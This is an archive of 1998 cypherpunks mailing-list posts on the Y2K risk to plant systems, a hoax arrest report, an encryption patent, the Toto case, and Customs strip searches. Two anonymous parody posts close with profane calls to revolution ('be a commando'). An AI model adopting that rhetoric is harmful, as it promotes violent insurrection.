>> 
>> Of course, I would love to hear someone counter this with evidence showing
>> that what has been related above is not true, or it is an urban myth etc.
>> But, I would like 'evidence'. Not conjecture or inuendo or suppositions.
>> 
>> If it were so, that there were indeed these inaccessable systems, would the
>> companies involved let it be known publically? I think not.
>> 
>> If this report is accurate, the remediation is 100% moot as I have said all
>> along, and you can kiss your butt good-bye.
> 
> I'm not sure if I want to play this game Mr. Milne -- you offer this
> article which is, conjecture, innuendo and supposition but demand that
> any counter story be documented by "evidence."  That's pretty tough and,
> frankly, I'm not up to the task as my knowledge is with electric power
> plants -- not oil refineries.
> 
> They do, of course, share some important characteristics and so I'll
> give it a try.  The approach will be from two perspectives -- first,
> I'll explain some power plant construction practices that contradict the
> refinery story; second, I'll offer another review of the nature of the
> "embedded" systems that might be at issue.
> 
> Power Plant (and refinery) construction . . . .
> 
> Remember, power plants and refineries are:
> o Capital intensive
> o Make increased use of computerized process control systems
> o Operate a continuous manufacturing/conversion process employing high
> temperatures and pressures.
> 
> Typical design life of a coal-fired power plant is 40 years.  During
> that period, any number of components *will* fail and *will have to be
> replaced.*  Wouldn't make much sense to put a $500million investment at
> risk 'cause a $20.00 part failed in some inaccessible location.  Thus
> EVERYTHING is accessible.
> 
> You want evidence and I'm not about to take you on a power plant tour
> but even if you've never been inside a power plant the construction
> practice is similar to that found in many other industrial settings and,
> if you've ever been aboard a naval vessel or taken a cruise, ships. 
> These settings are nothing like your home (or even an office) with all
> the infrastructure components nicely hidden behind walls -- pipes are
> exposed and clearly labeled -- power and control cables are laid in
> exposed cable trays and risers.  Electronic components are often mounted
> in racks with easy access from front and back -- probably not at all
> like your computer or home theatre configuration.  All this is to PERMIT
> MAINTENANCE, REPAIR and MODIFICATION.
> 
> So you need to understand that the problem isn't just maintenance, in
> general, or for y2k.  Process plants need to be modified frequently --
> market conditions demand a change in inputs or outputs.  Can't get
> enough sweet crude?  Exxon doesn't close the refinery -- they modify it
> to handle the new feedstock (I got the grand tour from a fellow I knew
> who worked at Exxon's Baton Rouge refinery, years ago).
> 
> Want some pictures?  Here are a few from several "continuous process"
> industries: http://www.powerprocesspiping.com/,
> http://www.bdmechanical.com/ppiping.htm,
> http://silverweb.nf.ca/m&m/cb-p&p.htm, and
> http://www.shambaugh.com/process.htm.
> 
> Now consider the nature of these embedded components.  This has been the
> subject of much discussion in csy2k.  I'd like to suggest that there are
> three broad categories of components in this context:
> 
> o The control system(s) -- SCADA -- one or more intelligent nodes build
> on traditional minicomputer, or more recently, microprocessor-based
> server technology.  These are very accessible -- they're in, adjacent
> to, or very near, the control room.  In an even more modern "distributed
> control system," some of the capability will be located in different
> areas of the plant.  Nevertheless, they still have to be very accessible
> -- stuff breaks -- memories get hard, multibit errors, disk drives fail,
> etc.
> 
> o Remote devices -- the control systems can't run without data and so
> you have dozens to thousands of remotes -- devices that measure process
> parameters (temperature, pressure, mass flow, volumetric flow,
> acceleration and mechanical position (valve position or tank levels))
> and a smaller number of remotes that can act on SCADA commands (start a
> motor, open a valve, etc.)  Though most of these devices are pretty
> dumb, some may have a bit of silicon-based intelligence and therefore
> susceptible to y2k problems.  BUT, they all have to be accessible
> because 1) they malfunction or need to be recalibrated and 2) plant
> modifications often require removal/replacement to accommodate process
> changes.
> 
> o Embedded systems -- I think that the consensus is that the real
> embedded systems are those systems that are not obviously run by a
> computer -- the power plants water chemistry analyzer or the refineries
> gas chromatograph.  These are on the site but they're not in the "plant"
> -- they're in the lab -- very accessible.
> 
> Now "accessible" doesn't always mean you can walk right up and touch
> it!  Guess where the flue gas monitoring remotes (temperature, opacity)
> are located -- top of the boiler or in the stack.  But here's the
> scenario -- opacity indicator increases (flue gas has more smoke in it)
> but the stack gas "looks" clear.  Do you shut down the plan on
> environment limits or do you send a maintenance man to replace the
> remote?
> 
> Now is it possible that conditions would be different at an oil
> refinery.  Sure, like I wrote at the beginning, I'm not really familar
> with these.  But, really, we'd be looking at some obtuse examples --
> imagine that rather than using a tank level indicator to see how much
> gasoline is in a tank, someone came up with the bright idea of putting a
> strain gauge *under* the tank and determing the amount of product in the
> tank but computing the weight on the gauge and using that to compute the
> amount of product.  The device fails and, we'll all agree, it is not
> practical to replace it.
> 
> Does the refinery stop using the tank?  I wouldn't think so.  They
> retrofit a traditional tank level indicator (float) to provide the
> needed information. 
> 
> HTH,
> 
> SAG

----------------------------------
E-Mail: Rob S <fireman@shaw.wave.ca>
Date: 02-Dec-98
Time: 17:02:18

This message was sent by XFMail
----------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 3 Dec 1998 02:01:35 +0800
To: jim_finder@hotmail.com
Subject: Re: Matt Blaze arrested???
Message-ID: <199812021702.SAA16916@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> X-Originating-IP: [208.198.164.2]
> From: "jim finder" <jim_finder@hotmail.com>
> To: cypherpunks@cyberpass.net
> Cc: cryptography@c2.net, mab@research.att.com
> Subject: Matt Blaze arrested???

The originating IP for this hotmail posting is lpwa.com, the Lucent
Personalized Web Assistant.  Ken Williams had posted a URL last week
which described how to send anonymous mail using lpwa as a proxy to
the hotmail service:

> I came across a funny article about a "CIA, DEA, FBI, Lucent 
> Technologies, Replay.com, Seed-bank.com Grand Conspiracy" at
> http://members.tripod.com/~spookbusters/sunnysnooping.htm

This is easy to do and provides moderate levels of anonymity.  You set
lpwa.com as your proxy in the browser settings, and then set up your
hotmail account and send the mail.  Maybe Jim Finder was just testing
the idea.

Blaze has attracted one or two cranks who try to harrass him, and this
may be another attempt to make some trouble for him.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Thu, 3 Dec 1998 08:40:05 +0800
To: Chuck McManis <cypherpunks@cyberpass.net
Subject: Re: L5 algorithm patent, and free eval version
In-Reply-To: <199812022046.VAA14983@replay.com>
Message-ID: <199812030018.SAA18851@baal.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:42 PM 12/2/98 -0800, Chuck McManis wrote:
>At 09:46 PM 12/2/98 +0100, Anonymous wrote:
>>Now that L5 has been patented, will you and your colleagues at Jaws
>>Technology make the L5 algorithm details available to the professional
>>cryptography community for independant verification. Could you also
>>provide the Canadian and/or US patent numbers?
>
>L5 has NOT been patented. The company simply announced it had been
>"accepted" which is in itself a non-sequitor since patents aren't
>"accepted." My guess is that the patent was filled and the application was
>"allowed." This means that the information in the patent has passed the
>examiner's preliminary examination for fitness (which is to say it isn't
>one of the things that are disallowed by the patent office.) This actually
>doesn't mean SQUAT since thousands of patents get "allowed" and then
>"returned" because they don't meet more stringent tests such as
>non-obviousness, do what the claims say they do, restate prior art, etc,
>etc. However I do believe that disclosure at this point would be premature
>because some of the things that examiner may ask may require the patent be
>rewritten substantially. 

It could mean that a set of claims were allowed.  I have been involved in
several patents.  Generally, you submit the patent and then a year and a 
half later the patent office responds.  This is the "first office action."
Sometimes
the claims are rejeted, sometimes some of them are allowed.  Then you send
a letter back to the patent office, and maybe draft new claims.  Eventually
(there
may be a second office action) a series of claims are allowed, meaning that
they will be included in the patent.  It can be another six months before the
patent issues.

I expect that's what the L5 people were talking about.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf =?iso-8859-1?Q?M=F6ller?= <ulf@fitug.de>
Date: Thu, 3 Dec 1998 02:32:09 +0800
To: Eric Cordian <cypherpunks@cyberpass.net
Subject: Re: Matt Blaze arrested???
In-Reply-To: <19981202051225.1348.qmail@hotmail.com>
Message-ID: <19981202183113.18018@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



> Who are you?  
> 
> While the originating IP of this message is owned by Bell Labs, 

208.198.164.2 alias lpwa.com is their web anonymizer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 3 Dec 1998 05:17:14 +0800
To: cypherpunks@toad.com
Subject: A person who counsels to fail to comply with the Act
Message-ID: <199812022015.VAA09805@replay.com>
MIME-Version: 1.0
Content-Type: text/plain





Check out this bit of american slavery:

"Failing to register or otherwise comply with the
Military Selective Service Act is, upon conviction,
punishable by a fine of up to $250,000, impris-
onment for up to five years, or both. A person
who knowingly counsels, aids or abets another to
fail to comply with the Act is subject to the same
penalties."

www.sss.gov/teach3.pdf (for teachers, note)




And this anti-FIJA bit: 

Except as may be authorized by a judge, no person or entity shall
distribute or attempt to distribute any written materials tending to
influence, interfere, or impede the lawful discharge of the duties of a
trial juror, or communicate or attempt to communicate with any person
summoned, drawn, or serving as a trial juror in the Superior Courts in Los
Angeles for purposes of influencing, interfering, or impeding the lawful
discharge of the duties of a trial juror in, or within 50 yards of any
public entrance to, the facilities within which the Superior Courts conduct
jury trials within this County. 

(Rule 5.2 added and effective 7/1/97.) 
http://www.co.la.ca.us/courts/superior-auc/CourtRules/Chapter5.htm#5.2














  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Thu, 3 Dec 1998 14:05:46 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: I Got Mine
In-Reply-To: <Pine.BSF.4.02.9812021205100.3865-100000@ideath.parrhesia.com>
Message-ID: <000201be1e81$1d19d800$7d8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



 From Greg Broiles:

: Just as a reasonable person will likely listen cautiously to an accused
: person proclaiming their innocence, a reasonable person should also listen
: cautiously when the prosecution proclaims someone's guilt.
..........................................


Thanks for the advice, it hadn't occurred to me they might be spoofing. <g>

(On a piece of paper they asked me to write down some of the statements I made
regarding my limited association with Toto (for the record, in lieu of a court
appearance), and asked that I also explain what I mean by "spoofing", as I had
thus described what Toto might have been up to with those incendiary messages.)

To their credit, I will say that they only told me more about Toto's activities
during the course of our discussions regarding the point in time when someone is
likely to be arrested based on their public expressions.   They related that
Toto had sent numerous threatening messages to the Mounties, and that although
he had alarming info out on his website that was not a problem; that they took
action only after he actually planted a bomb in one of their buildings.  Then
when I asked them as to why he was being tried in this area, rather than Canada
or Texas or Arizona, they brought up that Toto had threatened the judge trying
Jim's case (and also his other email regarding Billg).

At least they were not offensive, but polite and pleasant, but it's true one
should keep one's mind on the facts - the pertinent facts, the pertinence *of*
the facts, and no other facts.   I myself, of course, would never lie.  Unless I
had to. : )

"Well, it depends on what your definition of  'is'  is . . . "  What a great
Leader, and a Lawyer, showing us how to deal with the Law.

   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 3 Dec 1998 05:25:50 +0800
To: cypherpunks@cyberpass.net
Subject: L5 algorithm patent, and free eval version
Message-ID: <199812022046.VAA14983@replay.com>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 5 Oct 1998, Joey Roa wrote:

> My name is Joey Roa and I am Professional Services Team Leader of JAWS
> Technologies Inc.  I have recently become aware of your list.  A colleague
> ...
> The L5 algorithm is not yet published as we are waiting assurances from out
> patent attorneys that we have some protection for marketing purposes.

Hello Joey et all,

Now that L5 has been patented, will you and your colleagues at Jaws
Technology make the L5 algorithm details available to the professional
cryptography community for independant verification. Could you also
provide the Canadian and/or US patent numbers?

(Announcement of L5 patent:
<http://www.newswire.ca/releases/October1998/27/c6731.html>)

To cypherpunks readers, the free "shareware" version is available from:
<http://www.jawstech.com/products/jawsl5/download-free-trial/L5_ShareWare_Setup..exe>

I think the coderpunks readers might enjoy playing with this program. It
has proven entertaining so far for me.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 3 Dec 1998 05:41:27 +0800
To: cypherpunks@toad.com
Subject: SASMF, Part 2
Message-ID: <199812022055.VAA16481@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Space Aliens Stole My Freedom, Part 2
Know Your Spineless SheepleNeighbor(TM)

If the banks can be required to Know Their Customers, maybe you
can be required to Know Your Neighbor. This is already an 
established system in Cuba, so importing it should be cheap,
fast and easy.

-----

"Know Your Neighbor" Requirements

AGENCY: Federal Bureau of Investigation

ACTION: Notice of proposed rulemaking.

SUMMARY: The FBI is proposing to issue regulations requiring
FBI-supervised citizen-residents to develop and maintain 
"Know Your Neighbor" programs. As proposed, the regulations would 
require each citizen-resident to develop a program designed to 
determine the identity of its neighbors; determine its neighbors' 
sources of gossip and political views; determine the normal and 
expected comings and goings of its neighbors; monitor household 
activity for things that are inconsistent with those normal and 
expected activities; and report any activities of its customers that 
are determined to be suspicious, in accordance with the FBI's existing 
suspicious activity reporting regulations. By requiring citizen-
residents to determine the identity of their neighbors, as well as to 
obtain knowledge regarding the legitimate activities of their neighbors, 
the proposed regulations will reduce the likelihood that citizen-
residents will become unwitting participants in illicit activities 
conducted or attempted by their neighbors. It also will level the 
playing field between citizen-residents that already have adopted 
formal Know Your Neighbor programs and those that have not.

---

Minimum steps to take to comply with the Know Your Customer rule.

Identify the neighbor.

Paragraph (d)(2)(i) requires that the Know Your Neighbor program 
provide a system for determining the true identity of prospective 
neighbors. If a citizen-resident has reasonable cause to believe 
that it lacks sufficient information to know the identity of an 
existing neighbor, paragraph (d)(4)(ii)(A) also requires that the 
program provide a system for determining the identity of that 
neighbor.

---

Determine the source of people and property.

Paragraph (d)(2)(ii) requires that the Know Your Neighbor program 
provide a system for determining the source of a neighbor's 
possessions and household members. The amount of information needed to 
do this can depend on the type of neighbor in question.


Determine normal and expected comings and goings.

Paragraph (d)(2)(iii) requires that the Know Your Neighbor program 
provide a system for determining a neighbor's normal and expected 
comings and goings involving the citizen-resident. A citizen-resident's 
understanding of a neighbor's normal and expected comings and goings 
should be based on information obtained both when a neighbor 
relationship is established and during a reasonable period of time 
thereafter. It also should be based on normal comings and goings for 
similarly situated neighbors.  Without this information, a citizen-
resident is unable to identify suspicious comings and goings.


Determine if activity should be reported.

Once an activity is identified as inconsistent with normal and expected
behavior, paragraph (d)(2)(v) requires that a citizen-resident
determine if the activity warrants the filing of a Suspicious Activity
Report. This is consistent with a citizen-resident's existing 
obligations under 12 CFR 353.3(a).

---

A.	Reasons for and objectives of the proposed rule.

The proposed Know Your Neighbor rule is designed to deter and detect
neighborhood crimes, such as plots to establish "Constitutional
government," gathering of information about alleged "crimes" committed
by government agents, and meeting to discuss subversive literature
such as the Constitution.


B.	Requirements of the proposed rule.

The proposed rule would require citizen-residents to identify 
their neighbors, determine their neighbors' normal and expected 
activities, determine their neighbors' sources of possessions and
household members, monitor neighbors' activities to find those that are 
not normal and expected, and, for activities that are not normal and 
expected, identify which are suspicious.

Know Your Neighbor monitoring would be similar to monitoring that 
citizen-residents already do. For example, citizen-residents 
monitor neighbor activities to ensure that comings and goings
exceeding 100 per month are reported under the Neighborhood Secrecy 
Act, to ensure that neighbors do not overuse their driveways and
sidewalks, and to ensure that required comings and goings accurate and 
timely. 

-----

Editor's Note:

The worst part of this parody is that it's true. Cuba, like most
communist dictatorships, has a highly developed system of block
watchers. They are responsible for all of the foregoing, making
their reports to the secret police.

The U.S. government is instituting a system of "bank account watchers,"
toadies in the supine, excruciatingly closely regulated banking
industry, who will have to "know you," get to know your normal and
expected bank account activity, and watch your bank account activity
to detect and report "Suspicious Transactions."

Welkomm to Orwell's 1984. Welkomm to Nazi Amerika. Hold your arm out
straight... there... this will just sting a bit...

Does anyone not get it yet?

There is _nothing_ in the Constitution that gives the federal
government any power to subject the American people to 
financial surveillance, to restrict or require reporting of
cash transactions in any quantities, to restrict or encumber
firearms ownership to anyone not actually serving time in a 
prison, or to do _any_ of the onerous abominations being thrust 
upon us in new and terrible forms almost daily.

Does anyone not get it yet?

The federal government is forfeiting, just as fast as its
android minions can think up new ways to do it, its last
shreds of any claim to legitimacy. They may as well fly
the skull and crossbones over government buildings. Their
occupation army of marauding thugs is _here_, bringing to
ghastly life the very words of the bill of particulars
laid against King George III of England by the Founders
of this now-decayed, now-corrupt, hollow Republic, in the
Declaration of Independence.

Do they _never_ learn? (Obviously not)

Will we _have_ to go through it all again? (Obviously yes)

Has the line been crossed? (Obviously yes)

Has force been initiated? (Obviously yes)

Has the federal government placed itself outside the law?
(Obviously yes)

So be it.

Cry "Havoc!" and let loose the dogs of war.

The Revolution is upon us. We have nothing to lose but our 
imminent slavery. Sam Adams has a piece of advice: Keep your
own counsel. Translation: Do your own thing and don't look
to prop up your courage with the flawed courage and lack of
trustworthiness of others. Don't be a groupie -- be a
commando.

Required re-reading:

http://www.dhc.net/~toarms/henry.htm

FuckingFedUpMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 3 Dec 1998 15:14:07 +0800
To: Blanc <blancw@cnw.com>
Subject: RE: I Got Mine
In-Reply-To: <000201be1e81$1d19d800$7d8195cf@blanc>
Message-ID: <Pine.BSF.4.02.9812022247030.4891-100000@ideath.parrhesia.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 2 Dec 1998, Blanc wrote:

> (On a piece of paper they asked me to write down some of the statements I made
> regarding my limited association with Toto (for the record, in lieu of a court
> appearance)

My evidence books are packed in a moving box (sigh) at the moment, so
please take this with a grain of salt, but the only reason I see to ask
you to write anything down is to use it against you, either as a witness
or as a defendant. Your written statement is considered hearsay and
wouldn't be admissible at Toto's trial .. unless the prosecution was using
it to impeach you in the event that you testified, in which case it would
be admissible solely for the purpose of making you look like a liar. (If
the statement also tends to cast Toto in a poor light, the prosecution
probably won't lose any sleep over the spillover effects on the jury.)

If either side in a trial (especially a criminal trial) thinks you've got
something useful to say, they're going to need to put you on the witness
stand in front of the jury/judge and let you make your statements, and be
cross-examined, in person. Statements made out of court won't be
admissible to prove the truth of the matter they're discussing, unless the
situation happens to fit into one of a series of narrow exceptions.

One of the biggest exceptions is called "statements made by the opposing
party", aka "statements by the defendant" in a criminal trial. Another is
to impeach a witness with a prior inconsistent statement, where the prior
statement is inconsistent with their testimony at trial.

It smells like a setup to me.

--
Greg Broiles
gbroiles@netbox.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 3 Dec 1998 06:58:53 +0800
To: cypherpunks@toad.com
Subject: SASMF, Part 1
Message-ID: <199812022206.XAA29326@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Space Aliens Stole My Freedom, Part 1
Know Your Gutless SheepleCustomer(TM)

Let's just take a peek at how the new FDIC proposed reg would
look if transposed into an FCC setting:

-----

"Know Your Customer" Requirements

AGENCY: Federal Communications Commission

ACTION: Notice of proposed rulemaking.

SUMMARY: The FCC is proposing to issue regulations requiring
FCC-supervised communications carriers to develop and maintain 
"Know Your Customer" programs. As proposed, the regulations would 
require each carrier to develop a program designed to determine the 
identity of its customers; determine its customers' sources of 
communicated information; determine the normal and expected 
calls of its customers; monitor account activity for calls that are 
inconsistent with those normal and expected callss; and report any 
calls of its customers that are determined to be suspicious, in 
accordance with the FCC's existing suspicious activity reporting 
regulations. By requiring communication carriers to determine the 
identity of their customers, as well as to obtain knowledge regarding 
the legitimate activities of their customers, the proposed regulations 
will reduce the likelihood that communications carriers will become 
unwitting participants in illicit activities conducted or attempted by 
their customers. It also will level the playing field between
carriers that already have adopted formal Know Your Customer programs
and those that have not.

---

Minimum steps to take to comply with the Know Your Customer rule.

Identify the customer.

If a communication carrier offers private leased communication services, 
it is important that the carrier understand a customer's personal and 
business background, source of information to be communicated, and 
intended use of the private leased communication services.

---

The extent of the information regarding the customer that may be 
necessary to fulfill the carrier's Know Your Customer obligations 
should depend on a risk-based assessment of the customer and the 
calls that are expected to occur, and should be addressed within the 
communication carrier's Know Your Customer program.

---

Determine the source of information.

Paragraph (d)(2)(ii) requires that the Know Your Customer program 
provide a system for determining the source of a customer's 
information. The amount of information needed to do this can depend 
on the type of customer in question.


Determine normal and expected calls.

Paragraph (d)(2)(iii) requires that the Know Your Customer program 
provide a system for determining a customer's normal and expected 
calls involving the communication carrier. A carrier's understanding 
of a customer's normal and expected calls should be based on 
information obtained both when an account is opened and during a 
reasonable period of time thereafter. It also should be based on 
normal calls for similarly situated customers.  Without this 
information, an institution is unable to identify suspicious 
calls.

Monitor the calls. Paragraph (d)(2)(iv) requires that the
Know Your Customer program provide a system for monitoring, on an 
ongoing basis, the calls conducted by customers to identify 
calls 'that are inconsistent with the normal and expected calls for 
particular customers or for customers in the same or similar 
categories or classes.' The proposed regulation does not require that 
every call of every customer be reviewed. Rather, it requires that a 
financial institution develop a monitoring system that is commensurate 
with the risks presented by the accounts maintained at that 
institution.


Determine if call should be reported.

Once a call is identified as inconsistent with normal and expected
calls, paragraph (d)(2)(v) requires that a communication carrier
determine if the call warrants the filing of a Suspicious Activity
Report. This is consistent with an carrier's existing obligations
under 12 CFR 353.3(a).

---

A.	Reasons for and objectives of the proposed rule.

The proposed Know Your Customer rule is designed to deter and detect
communication crimes, such as obscene phone calls, getting tax advice, 
and discussing the Constitution.

B.	Requirements of the proposed rule.

The proposed rule would require communication carrier to identify 
their customers, determine their customers' normal and expected 
calls, determine their customers' sources of information communicated 
in calls, monitor calls to find those that are not normal and 
expected, and, for calls that are not normal and expected, identify 
which are suspicious.

Know Your Customer monitoring would be similar to monitoring that 
communication carriers already do. For example, communication carriers 
monitor customer calls to ensure that calling volumes exceeding 
10,000 per month are reported under the Communications Secrecy Act, to 
ensure that customers do not overuse their telephones, and to ensure 
that required calls are accurate and timely. 

-----

Editor's Note:

Putting this in an FCC context makes it pretty clearly bizarre
and unconstitutional, doesn't it? Where do these fuckers get
off pulling this Nazi shit? Just to carry it all the way into
Wonderland, we've drawn up this questionnaire, also in the 
telephone context:

Sample Questionnaire

1. Is this a __residential or __business account?

2. Approximately how many calls do you expect per month?

    a. Incoming ____

    b. Outgoing ____

3. List the subject matter of expected calls (use extra
   sheets if necessary: ____

4. List the telephone numbers from which you expect to
   receive calls (use extra sheets, etc.) ____

5. List the telephone numbers to which you expect to 
   place calls (use extra, etc.):____

6. List the names of people with whom you expect to speak:

7. List the Social Security numbers of people with whom
   you expect to speak: ____

8. List the political organizations to which you belong:

9. List the political organizations to which people with
   whom you expect to speak belong: ____

10. Are any of the organizations in (8) or (9) on the 
    Attorney General's list? Yes__  No__

11. If the answer to (10) was Yes, do you have a current
    and valid waiver for that (those) organization(s)?
    Yes__  No__

12. If the answer to (11) was No, proceed directly to
    federal prison. Do not pass urine; do not collect
    $200 from any ATM.

13. Do you regularly call your mother?  Yes__  No__

14. If the answer to (13) was Yes, list the topics you
    commonly talk about with your mother (use extra, etc.)

15. What are your sources of information for your
    telephone conversations?____

16. List all facts known to you, about which you expect to
    speak in your telephone calls:____

17. List all times at which you expect to receive or place
    calls:____

18. Attach transcripts of all conversations you expect to
    have. In lieu of transcripts, recordings may be attached.

19. Staple this form to your head, jam a toilet plunger
    handle up your ass, waddle to the nearest telephone,
    dial "1" and say, "I'm ready. Pick me up." Wait at
    your front door.

-----

FuckingFedUpMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Thu, 3 Dec 1998 13:21:25 +0800
To: cypherpunks@cyberpass.net
Subject: Fun at US Customs
Message-ID: <199812030507.XAA23418@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Apparently, US Customs doesn't even need a warrant to detain you for days
without the opportunity to talk to an attorney, x-ray you, pump your
stomach, give you laxatives, chain you to a hospital bed, or insert their
arms up to the elbow in one of your body openings. 

Are laws of other Western nations similar?  While I can understand
strip-searching travelers on occasion, the rest of this stuff seems a tad
much, especially in the absense of anything resembling due process.

Declan didn't write this, so I will post the whole thing. :)

-----
WASHINGTON (AP) -- Returning to Chicago from Jamaica, Gwendolyn
Richards was plucked from a line of air travelers by a Customs Service
inspector and ordered into a bare, windowless room. Over the next five
hours, she was strip-searched, handcuffed, X-rayed, and probed
internally by a doctor.
 
The armed Customs officers who led Richards in handcuffs through
O'Hare International Airport and drove her to a hospital for
examination suspected she might be smuggling drugs. They found
nothing.
 
``I was humiliated -- I couldn't believe it was happening,'' said
Richards, who is black and has joined a civil rights lawsuit against
Customs. ``They had no reason to think I had drugs.''
 
Richards, 27, isn't alone.
 
Officers last year ordered partial or full strip searches or X-rays
for 2,447 airline passengers, and found drugs on 27 percent of them,
according to figures compiled by the Customs Service.
 
Customs officials say tough tactics are necessary to catch the growing
number of smugglers who swallow cocaine-filled balloons, insert
packages of heroin into their body cavities, even hide drugs in a
hollow leg or under cover of a fake pregnancy.
 
``We still have a major drug problem in this country,'' Customs
Commissioner Raymond Kelly said in an interview Wednesday. ``We have
to do this.''
 
Richards and others who have sued Customs have alleged they were
targeted because of their race. Sixty percent of those pulled aside
last year for body searches or X-rays were black or Hispanic, Customs
figures show. Thirty-three percent of Hispanics who were searched were
found to have drugs compared with 31 percent of blacks and 26 percent
of whites.
 
Kelly said race isn't a factor. ``There are higher risk countries and
higher risk flights,'' he said. ``Those flights may be more populated
by a particular ethnic group.''
 
Last year, the Customs Service seized 858 pounds of cocaine and 803
pounds of heroin attached to or inside international air travelers'
bodies, officials said. More than 70 percent of the heroin seized at
airports was smuggled that way.
 
Acknowledging that searches ``can get pretty traumatic,'' Kelly said
Customs is reviewing its policies and experimenting with new
technology that might reduce the number of body searches. The review
comes after several lawsuits and complaints from travelers who say
they suffered abusive treatment and hours of confinement. For
instance:
 
--A Florida mother says her baby was born prematurely because Customs
officials forced her to take a prescription laxative when she was
seven months pregnant. In a lawsuit filed last month, Janneral Denson,
25, said she was taken from the Fort Lauderdale-Hollywood
International Airport and shackled to a hospital bed for two days so
inspectors could watch her bowel movements. She says her son, born 12
days later, suffered damage.
 
--Two Jamaican-born U.S. citizens each filed a $500,000 claim in
September over body cavity searches and X-rays in Tampa, Fla. One of
the women learned afterwards she was pregnant and agonized that her
fetus might have been harmed, according to their attorney, Warren Hope
Dawson. The baby was born healthy. Customs policy requires a pregnancy
test before a woman is X-rayed, but Dawson said the pregnant woman was
not tested.
 
--A 51-year-old widow returning from an around-the-world trip was held
for 22 hours at a San Francisco hospital, x-rayed and given the same
powerful laxative. Amanda Buritica of Port Chester, N.Y., won a
$451,001 lawsuit last February. A Boston nurse, Bosede Adedeji, won
$215,000 in a similar lawsuit in 1991.
 
Customs officials note that fewer than 2 percent of the 68 million
fliers who pass through Customs each year have their luggage opened.
Far fewer -- about 49,000 people -- are personally searched, usually
with a pat down.
 
The 1,772 strip searches last year ranged from people told to remove
their socks to passengers like Richards who were ordered to take off
their underwear and bend over. Strip searches are performed by
officers of the same gender.
 
The Customs review found 19 passengers who were subjected to pelvic or
rectal exams by doctors while inspectors watched. Drugs were found in
12 of those cases.
 
Congress and courts have given Customs broad authority to search for
drugs, weapons and other illegal imports.
 
The Supreme Court ruled that Customs officers at airports and border
crossings don't need the probable cause or warrants that police need
to search possessions. Customs officers can perform a strip search
based on ``reasonable suspicion'' that someone might be hiding
something illegal.
 
A Customs handbook obtained by The Associated Press advises officers
that reasonable suspicion usually requires a combination of factors,
including someone who: appears nervous, wears baggy clothing, gives
vague or contradictory answers about travel plans, acts unusually
polite or argumentative, wears sunglasses or acts sick. Race isn't
cited.
 
Customs officers can detain people for hours, even days, without
allowing them a telephone call to a lawyer or relative or charging
them with a crime. Inspectors say they keep detainees from making
calls so that drug associates aren't tipped off. Generally, if someone
is detained for eight hours or more, a federal prosecutor is notified.
 
Richards is among more than 80 black females who filed a class-action
lawsuit claiming they were singled out for strip searches at O'Hare
because of race and gender.
 
The plaintiffs include a 15-year-old girl, a mentally retarded woman,
and a woman who uses a wheelchair. Many decided to sue after seeing
news reports on Chicago's WMAQ-TV about strip searches of black women.
 
The agency has hired an outside contractor to review how inspectors
deal with the public, and is exploring ways to make the system less
hostile. In a test at Miami and New York airports, some passengers
selected for strip searches are given the option of having an X-ray
instead. The service is also studying new imaging technology that
shows things hidden under people's clothes.
 
Customs officers seek passengers' written consent for an X-ray, but it
isn't required. Some travelers say they felt coerced.
 
Las Vegas police officer Rich Cashton said a Customs inspector who
stopped him at Los Angeles International Airport last year grew angry
when Cashton asked what would happen if he refused an X-ray.
 
``He said, 'If you don't sign this form, I'm going to take you down to
the hospital and pump your stomach,'' Cashton recalled. ``He was using
that threat as intimidation to make me sign a consent form, which is
definitely illegal.''
 
Cashton, who identified himself as a police officer, was let go.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 3 Dec 1998 12:46:58 +0800
To: cypherpunks@cyberpass.net
Subject: Fwd: Code Red privacy workshops
Message-ID: <199812030425.UAA01622@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Sat, 28 Nov 98 23:19:16 0
>From: simon davies <simon@privint.demon.co.uk>
>Subject: Code Red privacy workshops
>
>
>
>
>PLEASE DISTRIBUTE
>
>PRIVACY INTERNATIONAL ANNOUNCES 
>THE "CODE RED" PRIVACY WORKSHOPS
>
>
>Friends and colleagues,
>
>In 1999, Privacy International - the international privacy 
>campaign organisation - will host a series of privacy workshops to 
>be  held in Brighton throughout the year on the second weekend of 
>each month.
>
>The workshops will have four purposes :
>
>1.  To brainstorm current privacy (and privacy related) issues;
>
>2.  To plan future events and campaigns;
>
>3.  To provide occasional training sessions in technical issues, media 
>skills, campaigning etc, and,
>
>4.  To give us all an opportunity to network and to have huge 
